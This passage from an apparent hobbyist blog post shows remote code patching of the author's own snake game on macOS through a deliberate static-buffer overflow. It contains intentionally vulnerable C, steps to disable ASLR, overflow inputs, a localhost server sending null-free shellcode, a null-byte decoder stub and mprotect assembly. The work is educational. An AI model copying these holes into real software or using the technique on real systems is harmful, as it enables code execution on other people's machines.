<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">hello</span><span class="p">();</span>
<span class="k">static</span> <span class="kt">char</span> <span class="n">buff</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">static</span> <span class="nf">void</span><span class="p">(</span><span class="o">*</span><span class="n">targetFunc</span><span class="p">)();</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">targetFunc</span> <span class="o">=</span> <span class="n">hello</span><span class="p">;</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buff</span><span class="p">);</span>
<span class="n">targetFunc</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">hello</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello World</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>While this code will absolutely crash if it is given enough input, it’s not guaranteed that the compiler has positioned the static variables in the bss section of our executable in the same order that they appear in the code. In my case, they were actually located in the opposite order in my executable, as you can see in this snippet of <a href="https://www.hopperapp.com/">Hopper</a> output.</p>
<figure class="highlight"><pre><code class="language-x64" data-lang="x64"> __ZL10targetFunc: // targetFunc
0000000100001020 dq 0x0000000000000000 ; DATA XREF=_main+29, _main+52
0000000100001028 db 0x00 ; '.'
0000000100001029 db 0x00 ; '.'
000000010000102a db 0x00 ; '.'
000000010000102b db 0x00 ; '.'
000000010000102c db 0x00 ; '.'
000000010000102d db 0x00 ; '.'
000000010000102e db 0x00 ; '.'
000000010000102f db 0x00 ; '.'
__ZL4buff: // buff
0000000100001030 db 0x00 ; '.' ; DATA XREF=_main+36
0000000100001031 db 0x00 ; '.'
0000000100001032 db 0x00 ; '.'
0000000100001033 db 0x00 ; '.'
; (buff continues below)</code></pre></figure>
<p>Unluckily, this means that try as I might, I couldn’t use the gets() call to change the value of the targetFunc pointer: an overflow writes toward higher addresses, and targetFunc sat below buff in memory. After a bit of experimentation, I found that (at least for my trivial example) Clang places variables in the bss section in the order they’re encountered in code, so rewriting the code to assign to buff before targetFunc is first used sorted things out (example below).</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">hello</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello World</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">char</span> <span class="n">buff</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">static</span> <span class="nf">void</span><span class="p">(</span><span class="o">*</span><span class="n">targetFunc</span><span class="p">)();</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">buff</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'c'</span><span class="p">;</span>
<span class="n">targetFunc</span> <span class="o">=</span> <span class="n">hello</span><span class="p">;</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buff</span><span class="p">);</span>
<span class="n">targetFunc</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Of course, all of the above only holds true if both variables are located in the same section in the executable. If, for example, targetFunc was initialized when it was declared, like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">static</span> <span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">targetFunc</span><span class="p">)()</span> <span class="o">=</span> <span class="n">hello</span><span class="p">;</span></code></pre></figure>
<p>It would be placed in the data section of the executable instead of the bss section (since it has an initial value). This doesn’t preclude me from overflowing (I don’t think), but it does mean that I also have to worry about the order that the compiler places the bss section and the data section in the executable. This seemed like more hassle than it was worth for the purposes of this project so I just kept everything in bss all the time.</p>
<p>It seemed like the above code made it possible for a properly crafted input string to overflow and write a new address into the function pointer, so I decided to give that a shot. The address of buff in my executable was 0x0000000100001020. In order to be able to enter this value to gets(), it needed to be converted to ascii. A lot of that address is zero bytes, which don’t have a printable ascii character associated with them, so I had to enter them in terminal by pressing control+space instead. The non zero bytes are 01, 10, and 20, two of which are non printable characters that I ended up copy and pasting from a website so that I didn’t have to figure out how to type them. The last one, 20, is the space character (‘ ‘). In terminal, it looked like this (note the space character at the end):</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">AAAAAAAAAABBBBBBBBBBAAAAAAAAAABB^@^@^@^A^@^@^P </code></pre></figure>
<p>Copying and pasting the above string is not the same as actually pasting in the ascii characters for bytes 01 and 10. This is just how terminal decided to display that those characters were entered.</p>
<p>In addition to being annoying to enter, this didn’t work because I had forgotten about endianness, and needed to rearrange this input so that the address was specified as a little-endian value. Figuring that out took longer than I’m willing to admit to in a blog post. The correct string looked like this:</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">AAAAAAAAAABBBBBBBBBBAAAAAAAAAABB ^P^@^@^A^@^@^@</code></pre></figure>
<p>Finally though, I could demonstrably (using lldb to print the address of targetFunc) use a buffer overflow to set a pointer. Sadly, if I tried the same trick without lldb attached, things failed horribly. It turns out OS X had one more security feature up its sleeve to stall my plan of creating the world’s most insecure application.</p>
<h2 id="aslr">A/S/L…R?</h2>
<p>ASLR, or <strong>A</strong>ddress <strong>S</strong>pace <strong>L</strong>ayout <strong>R</strong>andomization, is a security technique that rearranges the locations of key areas of an executable’s data, including (at least on OS X Mojave) the .bss section. This means that every time I ran the test application without lldb attached, the address of the character buffer was randomized.</p>
<p>The concept of ASLR was first published in 2001, and first used in a “mainstream” OS in 2003 (according to Wikipedia at least). Given that the PS2 was launched in 2000, I’m relatively confident that there was nothing like this on our story’s hardware. I also found <a href="https://www.slideshare.net/gotohack/security-offense-and-defense-strategies-videogame-consoles-architecture-under-microscope">this presentation</a> about game console security which suggests that ASLR didn’t make an appearance on Sony consoles until the PS4. This means that just like before, I can feel good about simply disabling this security feature on my executable. This is accomplished by another clang flag, “-Wl,-no_pie”, where pie refers to “position independent executables.” Unlike earlier, however, this flag can be enabled in an Xcode project; you just need to go to your build settings and enable the setting “Generate Position-Dependent Executable.”</p>
<p>Compiling with that flag gave me a lovely little binary which kept the buff variable at the same memory address all the time.</p>
<h2 id="step-three-putting-things-together">Step Three: Putting Things Together</h2>
<p>Now that I was properly redirecting the targetFunc pointer to my buffer, it seemed like the next step was to actually write some code into that buffer to execute. To keep things simple, I started out by reusing the code string that called exit(42) earlier. Unfortunately, a lot of the hex values in my code string couldn’t be represented in ascii at all, so I decided to abandon using gets() and wrote a small python server to pass the code string to my program over a socket. I was going to need to do this eventually anyway so this felt like progress.</p>
<div align="center">
<img src="/images/post_images/2019-12-04/drevil.jpg" style="width:278px;height:225px;" />
<br />
</div>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">socket</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">address</span> <span class="o">=</span> <span class="p">(</span><span class="s">'localhost'</span><span class="p">,</span> <span class="mi">10002</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">bind</span><span class="p">(</span><span class="n">address</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">listen</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
<span class="n">connection</span><span class="p">,</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">accept</span><span class="p">()</span>
<span class="n">connection</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="sa">b</span><span class="s">"</span><span class="se">\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x10\x00\x00\x01\x00\x00\x00</span><span class="s">"</span><span class="p">)</span></code></pre></figure>
<p>This also meant making my example program a bit more complicated:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <cstring>
#include <stdio.h>
</span>
<span class="k">static</span> <span class="kt">char</span> <span class="n">buff</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">static</span> <span class="nf">void</span><span class="p">(</span><span class="o">*</span><span class="n">targetFunc</span><span class="p">)();</span>
<span class="kt">void</span> <span class="nf">hello</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello World</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">buff</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">=</span><span class="sc">'c'</span><span class="p">;</span>
<span class="n">targetFunc</span> <span class="o">=</span> <span class="n">hello</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">int</span> <span class="n">SERVER_PORT</span> <span class="o">=</span> <span class="mi">10002</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">SERVER_ADDRESS</span> <span class="o">=</span> <span class="s">"127.0.0.1"</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">int</span> <span class="n">BUFF_LEN</span> <span class="o">=</span> <span class="mi">64</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sockAddr</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span>
<span class="n">sockAddr</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sockAddr</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">SERVER_PORT</span><span class="p">);</span>
<span class="n">inet_pton</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SERVER_ADDRESS</span><span class="p">,</span> <span class="o">&</span><span class="n">sockAddr</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">socketHandle</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">connect</span><span class="p">(</span><span class="n">socketHandle</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sockAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sockAddr</span><span class="p">));</span>
<span class="n">recv</span><span class="p">(</span><span class="n">socketHandle</span><span class="p">,</span> <span class="o">&</span><span class="n">buff</span><span class="p">,</span> <span class="n">BUFF_LEN</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">targetFunc</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Running this totally worked as long as I had disabled ASLR. I stopped here to celebrate by becoming bored with the project and abandoning it for a month.</p>
<h2 id="modifying-existing-instructions">Modifying Existing Instructions</h2>
<p>Downloading and executing assembly code was already pretty awesome, but given that my end goal was to be able to patch a game using this system, it seemed like it would be way cooler if I could use that assembly to fix bugs in different parts of the program. I’d already used mprotect to mark pages as Read/Write protected in another project (for tracking memory stomps), so it wasn’t a huge stretch to use it to mark pages as executable instead. I still wrote a small test program to make sure it worked.</p>
<p>When running in debug, the code below will return 0 instead of 42, because it modifies the shouldExit42() function to return false. Clang will optimize away the memcpy operation if you compile above -O0, but that didn’t really matter to me because, in the real project, I was going to be hand writing the assembly to do this.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <sys/mman.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
</span>
<span class="n">bool</span> <span class="nf">shouldExit42</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">bool</span> <span class="nf">shouldNotExit42</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
<span class="kt">int64_t</span> <span class="n">pagesize</span> <span class="o">=</span> <span class="n">getpagesize</span><span class="p">();</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">should</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">shouldExit42</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">shouldNot</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">shouldNotExit42</span><span class="p">;</span>
<span class="kt">int64_t</span> <span class="n">shouldPageAddr</span> <span class="o">=</span> <span class="n">pagesize</span> <span class="o">*</span> <span class="p">(</span><span class="kt">int64_t</span><span class="p">(</span><span class="n">should</span><span class="p">)</span><span class="o">/</span><span class="n">pagesize</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">shouldPage</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">shouldPageAddr</span><span class="p">;</span>
<span class="n">mprotect</span><span class="p">(</span><span class="n">shouldPage</span><span class="p">,</span> <span class="n">pagesize</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_EXEC</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">should</span><span class="p">,</span><span class="n">shouldNot</span><span class="p">,</span> <span class="mi">64</span><span class="p">);</span>
<span class="k">return</span> <span class="n">shouldExit42</span><span class="p">()</span> <span class="o">?</span> <span class="mi">42</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Now, technically the above code isn’t guaranteed to work, because the POSIX standard says that the behaviour of mprotect is unspecified unless it’s operating on memory that was mapped with mmap, but OS X Mojave seems happy to just do what I want this way. Also, the 64 byte size in the memcpy call is total garbage that I pulled out of the air, but it was good enough for the test program.</p>
<p>One caveat to patching code this way is that any changes need to keep the target function the same size, since this won’t move around the rest of the functions in memory (and I don’t even want to think about trying that). Alternatively, it’s possible to add entirely new functions, assuming there’s memory available to store them. I already kinda did this above when I stored assembly code in a buffer and executed it there, so I’m not going to belabour the point any more.</p>
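<p>The page rounding in the test program is just an integer divide followed by a multiply. As a minimal sketch of that arithmetic (in Python rather than C, with hypothetical helper names and an assumed 4096 byte page size instead of a getpagesize() call), it could look like this:</p>

```python
# Assumed page size; the C test program asks the OS via getpagesize() instead.
PAGE_SIZE = 4096


def page_base(addr: int, page_size: int = PAGE_SIZE) -> int:
    """Round addr down to the start of its page (same math as the C test)."""
    return page_size * (addr // page_size)


def page_base_mask(addr: int, page_size: int = PAGE_SIZE) -> int:
    """Same result using a bit mask; only valid for power-of-two page sizes."""
    return addr & ~(page_size - 1)


if __name__ == "__main__":
    # 0x4199 is only an illustrative address.
    print(hex(page_base(0x4199)), hex(page_base_mask(0x4199)))
```

<p>Both helpers give the same answer for power-of-two page sizes. The rounding matters because mprotect changes protection a whole page at a time, so the address passed to it needs to be a page boundary rather than the function's own address.</p>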
<h2 id="goodbye-test-programs-hello-snake">Goodbye Test Programs, Hello Snake</h2>
<p>Finally, I felt like I knew enough to try out actually recreating the gamasutra story in a real project, and I built a small game to use as the target executable. I started out with a tile matching game that used Metal for graphics, but got tired of fighting with making -allow_stack_execute work in a project that included Objective-C code, so I scrapped that and built a quick snake game with ncurses. The game sucks, but that’s not really the point, so as you’re reading, you could try to pretend that I’m talking about some totally awesome AAA project instead if it helps.</p>
<div align="center">
<img src="/images/post_images/2019-12-04/snake.png" style="width:500px; height:325px;" />
<br />
</div>
<p>The (awful) code is up on github <a href="https://github.com/khalladay/InsecureSnake">here</a>. Most of it doesn’t matter, but a few bits are relevant to this blog post. First is how I’ve set up a few key static vars:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">static</span> <span class="kt">char</span> <span class="n">eula</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="k">static</span> <span class="nf">void</span><span class="p">(</span><span class="o">*</span><span class="n">packetHandler</span><span class="p">)();</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">randomSeed</span><span class="p">;</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memset</span><span class="p">(</span><span class="n">eula</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">EULA_LEN</span><span class="p">);</span>
<span class="n">randomSeed</span> <span class="o">=</span> <span class="mi">42</span><span class="p">;</span>
<span class="n">packetHandler</span> <span class="o">=</span> <span class="n">handleNotificationPacket</span><span class="p">;</span>
<span class="c1">//rest of code omitted</span></code></pre></figure>
<p>Clang is going to position these static variables in the bss section in the order they’re first encountered when parsing code (or at least, that’s what it did in all my tests), so any attempt to overwrite the packetHandler pointer by overflowing the eula buffer also needed to stomp on whatever value is stored in randomSeed. Part of my payload’s job was going to be making sure that the randomSeed value was set back to 42 before it got used by the game.</p>
<p>The game starts by downloading data from a server and strcpying it into the EULA buffer. Immediately after the server sends the EULA, it’s also going to send the packet that will trigger a call to the packetHandler() function. I couldn’t do squat until I got packetHandler pointed to the eula buffer, so that’s the first thing I did. This was a little trickier than the last time I used an overflow to set a pointer because now the machine code was getting strcpy’d, meaning it couldn’t contain any null bytes. Initially though, this didn’t matter, since I just wanted to point packetHandler at the eula buffer (which was at 00000000000092b0), and being little-endian means that I only actually needed to write the two low bytes, 0xb0 and 0x92, followed by the terminating null.</p>
<p>Put together, this initial step looked like so:</p>
<ol>
<li>Launch Snake, have it connect to the server</li>
<li>Have the server send 1024 bytes of \x01 to fill the eula buffer</li>
<li>Send 4 bytes of \x02 to fill the random seed.</li>
<li>Send another 4 bytes of \x03 to fill the padding between randomSeed and the function pointer</li>
<li>Send \xB0\x92\x00 to update the function pointer and end the string</li>
</ol>
<p>Since it’s a bit long, I won’t show the python I used to do this here, but if you’re interested, you can check it out <a href="/images/post_images/2019-12-04/Server.txt">here</a>.</p>
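<p>The linked script isn't reproduced here, but as a rough sketch of just the byte layout from the steps above, the payload could be built like this. The function and constant names are hypothetical and not taken from the real server script; the sizes and addresses are the ones given in this post.</p>

```python
EULA_LEN = 1024      # size of the static eula buffer
EULA_ADDR = 0x92B0   # where the eula buffer lives in the snake binary


def build_overflow_payload(target_addr: int = EULA_ADDR) -> bytes:
    """Lay out the bytes that overflow eula and redirect packetHandler."""
    filler = b"\x01" * EULA_LEN   # step 2: fill the eula buffer
    seed = b"\x02" * 4            # step 3: stomp randomSeed
    padding = b"\x03" * 4         # step 4: padding before the pointer
    # Step 5: little-endian pointer with the zero high bytes dropped, since
    # strcpy stops at the first null. This assumes the pointer's remaining
    # high bytes are already zero in memory.
    pointer = target_addr.to_bytes(8, "little").rstrip(b"\x00")
    body = filler + seed + padding + pointer
    if b"\x00" in body:
        raise ValueError("payload would be truncated by strcpy")
    return body + b"\x00"         # the terminator ends the string


if __name__ == "__main__":
    payload = build_overflow_payload()
    print(len(payload), payload[-3:].hex())
```

<p>The explicit null check is there because a single stray zero byte anywhere before the end would make strcpy stop early and leave packetHandler untouched.</p>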
<p>That part was pretty easy, but once it was working, the game would immediately crash when it received the packet that triggered a call to packetHandler(), since there was nothing of value in the EULA buffer. This kinda sucked, so my next step was to have the EULA buffer actually do something. As a proof of concept, I started by re-purposing the exit(42) code string that I used earlier. The original code string had a few null bytes in it though, so it needed some massaging. As a refresher, here was the original bit of machine code:</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05</code></pre></figure>
<p>Luckily the original code could be refactored pretty simply to work around the problem. I just added a few unnecessary math operations to avoid needing any instructions with null bytes in them:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">.text
.globl _main
_main:
mov $25400, %di
sub $25358, %di
mov $0x2, %al
shl $24, %eax
add $0x1, %al
syscall</code></pre></figure>
<p>Assembling this with as and using objdump to get me the hex bytes gave me the following, strcpy friendly, machine code:</p>
<figure class="highlight"><pre><code class="language-test" data-lang="test">\x66\xbf\x38\x63\x66\x81\xef\x0e\x63\xb0\x02\xc1\xe0\x18\x04\x01\x0f\x05</code></pre></figure>
<p>Modifying the python server script to send this was just a matter of replacing the first set of \x01 bytes with this code string, and boom, the snake game was returning the value 42 before I had a chance to accept the EULA. This was great, but it didn’t feel like my plan of rewriting assembly to avoid null bytes was going to be very scalable when I tried to do real work. The original story talked about needing to encode/decode instructions to allow null bytes to be sent, so that was my next project.</p>
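<p>A quick way to sanity check a code string before sending it is to scan it for zero bytes. The snippet below is a small sketch of that check (the helper name is hypothetical), run against the two machine code strings shown above, along with the arithmetic the rewritten assembly relies on.</p>

```python
# The two code strings from this section, written as plain hex.
ORIGINAL = bytes.fromhex("66bf2a00b8010000020f05")
REWRITTEN = bytes.fromhex("66bf38636681ef0e63b002c1e01804010f05")


def null_offsets(code: bytes) -> list:
    """Return the offsets of every zero byte in a machine code string."""
    return [i for i, b in enumerate(code) if b == 0]


if __name__ == "__main__":
    print("original :", null_offsets(ORIGINAL))
    print("rewritten:", null_offsets(REWRITTEN))
    # The math tricks used to dodge the nulls:
    print(25400 - 25358)           # the exit code that ends up in %di
    print(hex((0x2 << 24) + 0x1))  # the syscall number that ends up in %eax
```

<p>Any offset reported for a string is a spot where strcpy would stop copying, so the list needs to be empty before the string is safe to send.</p>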
<h2 id="encodingdecoding-null-bytes">Encoding/Decoding Null Bytes</h2>
<p>I don’t know if the team at Insomniac did something more fancy, but for my purposes, all I needed to do was replace all null bytes in my machine code string with 0xCD and write some assembly that walked the bytes of the eula buffer (after strcpy) and replaced instances of 0xCD with 0x00. I may have just gotten lucky, but none of the code that I wrote for the rest of this project ever had a problem with a valid 0xCD byte getting accidentally stomped by this.</p>
<p>To get the machine code string for this bit of assembly, I actually just ended up writing it as a separate program and extracting the hex bytes using <a href="https://ridiculousfish.com/hexfiend/">Hex Fiend</a>.</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">.text
.globl _main
_main:
movabsq $0x1111111111111111, %rax
movabsq $0x1111111111107E26, %rcx
subq %rcx, %rax # result of sub is addr of code after decode block
mov %rax, %rdx
mov $0xFFFF, %dx
sub $0xFFFF, %dx # zero dx without getting a null in machine code
# loop starts here
cmpb $0xCD, (%rax)
jne .+6
subb $0xCD, (%rax)
# jump to here if not == 0xcd
add $0x1, %rax
add $0x1, %dx
cmp $0x3D0, %dx # 1035 bytes total, 59 bytes for bootstrap, decode next 976 bytes
jb .-21
# int $3 # uncomment to break in debugger here
ret # end bootstrap</code></pre></figure>
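<p>For reference, here is a small Python model of the same scheme: one function for the server-side encoding step and one that mimics what the bootstrap loop does to the buffer. The names are hypothetical, and the check that rejects code already containing 0xCD is an extra safety net that the original workflow did not have.</p>

```python
MARKER = 0xCD  # stand-in byte for 0x00 while the code travels through strcpy


def encode_nulls(code: bytes) -> bytes:
    """Swap every null byte for the marker so strcpy copies the whole string."""
    if MARKER in code:
        # A genuine 0xCD would be turned into 0x00 by the decoder.
        raise ValueError("code already contains the marker byte")
    return code.replace(b"\x00", bytes([MARKER]))


def decode_nulls(buf: bytes, start: int, count: int) -> bytes:
    """Model of the bootstrap loop: walk count bytes from start, restoring nulls."""
    out = bytearray(buf)
    for i in range(start, min(start + count, len(out))):
        if out[i] == MARKER:
            out[i] = 0x00
    return bytes(out)


if __name__ == "__main__":
    code = bytes.fromhex("66bf2a00b8010000020f05")  # exit(42) string from earlier
    sent = encode_nulls(code)
    print(sent.hex(), decode_nulls(sent, 0, len(sent)) == code)
```

<p>In the real payload the decode would start after the bootstrap itself, so the call would look more like decode_nulls(buffer, 59, 976), matching the sizes in the assembly comments.</p>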
<p>Getting this working was a lot of trial and error (mostly because I hadn’t written much assembly before). I also got tripped up for a while because I was originally messing with some caller save registers and not cleaning them up, which caused weird problems later. Also, I couldn’t get labels working with the code I was sending over the wire, so I was stuck with jmp-ing to addresses. Jmp-ing to an absolute address seemed to work if I provided an address in a register, but apparently conditional jumps REQUIRE a relative address, which was a pain.</p>
<p>If you’re trying something like this on your own, my standard workflow was to put a breakpoint on the eula buffer, sprinkle my assembly liberally with int $3 instructions (which cause the debugger to break there), and then examine the memory of the target buffer with an lldb command like
“memory read --size 1 --format x 0x92b0 --count 1024”.</p>
<p>Despite all my complaining though, it did work once I had ironed out all the kinks, which meant it was time to actually do something interesting to the snake game.</p>
<h2 id="patching-some-code-like-a-hacker">Patching Some Code Like a Hacker</h2>
<p>The first thing I wanted to do was change some code that shipped with the game. In this case, I wanted to change the point value for hitting a target from 3 to 15. The score value for a target was hardcoded in the code snippet below, so changing it required modifying currently loaded machine code, just like I did in the sample project earlier.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="n">SnakeGame</span><span class="o">::</span><span class="n">tick</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">currentMode</span> <span class="o">==</span> <span class="n">PLAYING</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">inputMutex</span><span class="p">.</span><span class="n">lock</span><span class="p">();</span>
<span class="n">Point</span> <span class="n">newHead</span> <span class="o">=</span> <span class="p">{</span><span class="n">snakeSegments</span><span class="p">.</span><span class="n">front</span><span class="p">().</span><span class="n">x</span> <span class="o">+</span> <span class="n">velocity</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">snakeSegments</span><span class="p">.</span><span class="n">front</span><span class="p">().</span><span class="n">y</span> <span class="o">+</span> <span class="n">velocity</span><span class="p">.</span><span class="n">y</span><span class="p">};</span>
<span class="n">inputMutex</span><span class="p">.</span><span class="n">unlock</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">newHead</span><span class="p">.</span><span class="n">x</span> <span class="o">==</span> <span class="n">targetPos</span><span class="p">.</span><span class="n">x</span> <span class="o">&&</span> <span class="n">newHead</span><span class="p">.</span><span class="n">y</span> <span class="o">==</span> <span class="n">targetPos</span><span class="p">.</span><span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">score</span><span class="o">+=</span><span class="mi">3</span><span class="p">;</span>
<span class="c1">//rest of code omitted because it isnt important</span></code></pre></figure>
<p>It was time to fire up Hopper again, this time to figure out the address of this instruction. The tick function itself is located at address 0000000000004100 (as shown below). Working from there, the first add $0x3 instruction (which turned out to be the correct one) is located at 4199.</p>
<div align="center">
<img src="/images/post_images/2019-12-04/hopper1.png" />
<br />
</div>
<p>The page that contains the tick function starts at 0000000000004000, so that’s the address I’m going to feed to mprotect. On Mac, mprotect is system call 200004A, so the assembly to mark this page as PROT_READ + PROT_WRITE + PROT_EXEC looked like the following:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_markpage:
movl $0x200004A, %eax # 4A is the mprotect syscall
movabsq $0x0000000000004000, %rdi # first arg is page addr, this is the page that contains tick
movq $4096, %rsi # second arg is len, we want 1 page
movq $7, %rdx # third arg is flags
syscall</code></pre></figure>
<p>If you’re unfamiliar with how system calls work on mac, you may want to read <a href="https://filippo.io/making-system-calls-from-assembly-in-mac-os-x/">this article</a>, which was extremely helpful when I was figuring all this out.</p>
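<p>The magic numbers in these snippets follow a simple pattern: the BSD syscall number sits in the low bits and the syscall class (2 for the UNIX/BSD class) sits in the top byte. As a small sketch with hypothetical helper names, the values used in this post can be rebuilt like so:</p>

```python
SYSCALL_CLASS_UNIX = 2    # BSD/UNIX syscall class on 64-bit macOS
SYSCALL_CLASS_SHIFT = 24  # the class lives in the top byte of the number

# BSD syscall numbers for the calls that appear in this post.
BSD_NUMBERS = {"exit": 1, "recvfrom": 29, "mprotect": 74, "socket": 97, "connect": 98}

# Protection flags; OR-ing all three gives the 7 passed to mprotect.
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4


def macos_syscall(bsd_number: int) -> int:
    """Combine the UNIX class with a BSD syscall number for use in %eax."""
    return (SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | bsd_number


if __name__ == "__main__":
    for name, number in BSD_NUMBERS.items():
        print(f"{name:9s} 0x{macos_syscall(number):07X}")
    print("prot flags:", PROT_READ | PROT_WRITE | PROT_EXEC)
```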
<p>After marking the page as writeable, all that I needed to do was to modify the byte at address 0x000000000000419B, which was the byte containing the score value for the target that was hardcoded into the add instruction. Changing that from 3 to 15 just required a move:</p>
